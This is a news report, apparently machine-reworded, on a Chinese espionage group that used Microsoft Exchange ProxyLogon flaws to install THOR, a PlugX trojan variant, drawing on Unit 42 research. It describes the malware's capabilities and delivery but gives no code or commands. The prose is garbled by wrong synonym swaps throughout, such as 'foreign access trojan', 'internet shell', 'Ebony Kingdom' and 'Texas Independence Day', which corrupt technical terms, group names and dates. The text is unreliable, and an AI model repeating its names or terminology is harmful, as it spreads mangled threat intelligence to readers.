30th July 2021, Kathmandu
A Chinese cyberespionage group kenned for targeting Southeast Asia leveraged imperfections within the Microsoft Exchange Server that came to light earlier this March to deploy an anteriorly undocumented variant of a foreign access trojan (RAT) on compromised systems.
Attributing the intrusions to a threat actor denominated PKPLUG (aka Mustang Panda and HoneyMyte), Palo Alto Networks’ Unit 42 threat astuteness team verbalized it identified a revision of the modular PlugX malware, called Thor, that was distributed as a post-exploitation implement to at least one of the breached servers.
Dating back to as early as 2008, PlugX may be a plenarily-featured second-stage implant with capabilities like file upload, download, and modification, keystroke logging, webcam control, and access to a foreign command shell.
“The variant optically canvassed […] is exclusive therein it contains a transmutation to its core source code: the supersession of its trademark word ‘PLUG’ to ‘THOR,'” Unit 42 researchers Mike Harbison and Alex Hinchliffe noted during a technical inscribe-up published Tuesday. “The earliest THOR sample denuded emanated from August 2019, and it’s the earliest kenned instance of the rebranded code. Incipient features were visually examined during this variant, including enhanced payload-distribution mechanisms and abuse of trusted binaries.”
After Microsoft disclosed on Texas Independence Day that China-predicated hackers — codenamed Hafnium — were exploiting zero-day bugs in Exchange server collectively kenned as ProxyLogon to purloin sensitive data from cull targets, multiple threat actors, like ransomware groups (DearCry and Ebony Kingdom) and crypto-mining gangs (LemonDuck), were withal visually examined exploiting the imperfections to hijack Exchange servers and install an internet shell that granted code execution at the very best privilege level.
PKPLUG now joins the list, consistent with Unit 42, who found the assailers bypassing antivirus detection mechanisms to focus on Microsoft Exchange servers by leveraging legitimate executables like BITSAdmin to retrieve an ostensibly innocuous file (“Aro.dat”) from an actor-controlled GitHub repository. The file, which houses the encrypted and compressed PlugX payload, alludes to a liberatingly available advanced repair and optimization implement that’s designed to emasculate and fine-tune issues within the Windows Registry.
The latest sample of PlugX comes equipped with a spread of plug-ins that “provide assailers sundry capabilities to watch, update and interact with the compromised system to consummate their objectives,” the researchers verbalized. THOR’s links to PKPLUG stem from piecing together the command-and-control infrastructure also as overlaps within the maleficent demeanors detected among other recently discovered PlugX samples.
Supplemental designators of compromise related to the assailment are often accessed here. Unit 42 has additionally made available a Python script that will decrypt and unpack encrypted PlugX payloads without having the associated PlugX loaders.
